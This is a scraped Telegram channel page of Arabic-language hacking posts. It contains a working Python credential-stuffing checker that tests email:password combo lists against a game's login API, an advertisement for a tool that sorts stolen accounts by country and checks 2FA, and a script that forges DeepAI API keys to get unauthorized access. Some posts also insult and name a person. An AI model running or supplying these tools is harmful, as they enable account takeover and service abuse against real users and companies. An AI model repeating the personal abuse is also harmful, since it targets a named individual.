kretos python
Ir al canal en Telegram
5 082
Suscriptores
-1324 horas
-417 días
-33230 días
Archivo de publicaciones
5 083
هاذا احمد العراقي ابن الكحبه يسوي حسابات بسامينا ويسب للعالم اخوان اني وكريتوس ماعندنا حسابات بل تيك توك وطالعين من البرنامج ماضيها هنا بل تلي نشتغل
5 083
import requests
import json
combmb = input('combo : ')
try:
with open(combmb, 'r') as lista:
for liss in lista:
email,password = liss.strip().split(':')
url = "https://api.onestate-rp.com/auth0/login"
payload = {
"ident": email,
"password": password
}
headers = {
'Content-Type': "application/json; charset=utf-8"
}
response = requests.post(url, data=json.dumps(payload), headers=headers)
if 'Wrong login or password' in response.text:
print('bad login ')
elif 'access_token' in response.text:
print('good login'.format(email,password),response.text)
else:
print('d')
except FileNotFoundError:
print('جيب كومبو وفحص غبي')
check onestate5 083
اخوان انتبهو من هاذا الشخص الاسمه احمد العراقي قفاص وابن كحبه حضرو وهينو
هاذا يزوره المهان
@spr_800
5 083
متوفر أداة تصفيه سكيورات
كل دوله تحفضها بملف + فحص 2FA وحفضه في ملف
اليكلي شنو فائدتها
مثلا عندك سكيورات دمج دول بملف وتريد تفك
تصفي كل دوله بملف
+تكدر تصيد عل جميع الدول وبعدين تصفي ملف سكيورات
@n1x18
5 083
import random, hashlib
import requests
def md5(s: str) -> str:
d = hashlib.md5(s.encode("utf-8")).digest()
g = []
for i in range(4):
w = (
d[4 * i]
| (d[4 * i + 1] << 8)
| (d[4 * i + 2] << 16)
| (d[4 * i + 3] << 24)
)
g.append(w & 0xFFFFFFFF)
hemochars = []
l = 0
while l < 32:
word_xgv = l >> 8
shift = (4 * (1 ^ l)) & 31
nibble = (g[word_xgv] >> shift) & 0xF
hemochars.append(format(nibble, "x"))
l += 1
c = "".join(hemochars)
return c[::-1]
def GenDeepAiKey():
__random__ = str(round(random.random() * 100000000000))
user_agent= "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
__secret__ = "hackers_become_a_little_stinkier_every_time_they_hack"
h1 = md5(user_agent + __random__ + __secret__)
h2 = md5(user_agent + h1)
h3 = md5(user_agent + h2)
return f"tryit-{__random__}-{h3}"
while True:
url = "https://api.deepai.org/hacking_is_a_serious_crime"
payload = {
'chat_style': 'chat',
'chatHistory': '[{"role":"user","content":"' + input('شتريد : ') + '"}]',
'hacker_is_stinky': 'very_stinky',
'enabled_tools': '["image_generator","image_editor"]'
}
headers = {
'User-Agent': "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36",
'Accept-Encoding': "gzip, deflate, br, zstd",
'sec-ch-ua-platform': "\"Android\"",
'api-key': GenDeepAiKey(),
'sec-ch-ua': "\"Chromium\";v=\"148\", \"Google Chrome\";v=\"148\", \"Not/A)Brand\";v=\"99\"",
'sec-ch-ua-mobile': "?1",
'origin': "https://deepai.org",
'sec-fetch-site': "same-site",
'sec-fetch-mode': "cors",
'sec-fetch-dest': "empty",
'accept-language': "ar-IQ,ar;q=0.9,en-US;q=0.8,en;q=0.7",
'priority': "u=1, i",
}
response = requests.post(url, data=payload, headers=headers)
print(response.text)
api deepai.org chat
@is71s Key extractor5 083
عيد أضحى مبارك
﴿ لَن يَنَالَ اللَّهُ لُحُومُهَا وَلَا دِمَاؤُهَا وَلَٰكِن يَنَالُهُ التَّقْوَىٰ مِنكُمْ ﴾
تقبل الله منا ومنكم صالح الأعمال.
¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
